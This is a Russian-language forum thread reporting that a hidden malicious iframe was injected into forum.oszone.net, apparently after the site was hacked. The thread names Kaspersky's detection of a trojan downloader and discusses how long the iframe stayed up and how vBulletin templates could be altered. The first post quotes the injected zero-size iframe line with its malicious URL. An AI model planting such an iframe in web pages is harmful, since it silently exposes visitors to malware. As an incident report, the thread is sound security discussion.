Вредносный скрипт на forum.oszone.net

[vaber 350]

На этом форуме http://forum.oszone.net/ встроен вредоносный скрипт

<iframe src="http://nerik.info/Alex/index.php" width="0" height="0" style="display:none"></iframe>

Веб-антивирус Касперского детектирует наличие скрипта при посещении данного сайта и позволяет его блокировать (обнаружено: троянская программа Trojan-Downloader.VBS.Psyme.fc URL: hxxp://nerik.info/Alex/index.php//Crypt.DCScript).

Вероятно сайт был взломан и злоумышленник разместил свой скрипт.

На данный момент скрипт удален.

Но как минимум сутки он пробыл, а вероятно и больше.

http://forum.kaspersky.com/index.php?showt...mp;#entry314232

Причем постоянно на озоновском форуме находиться более полутысячи человек.

[Ego1st 95]

Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

[vaber 350]

Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

Меньше суток с того момента, когда на http://forum.kaspersky.com разместили данную информацию. Сколько он до этого там находился - неизвестно.

[Ego1st 95]

на газоне думаю это быстро обнаружилось..

хотя небуду спорить малоли чего и где было..

[Сергей Ильин 1537]

Форум у них на движке vBulletin.

Досточно было получить учетные данные админа, чтобы внести изменения в html-шаблоны форума/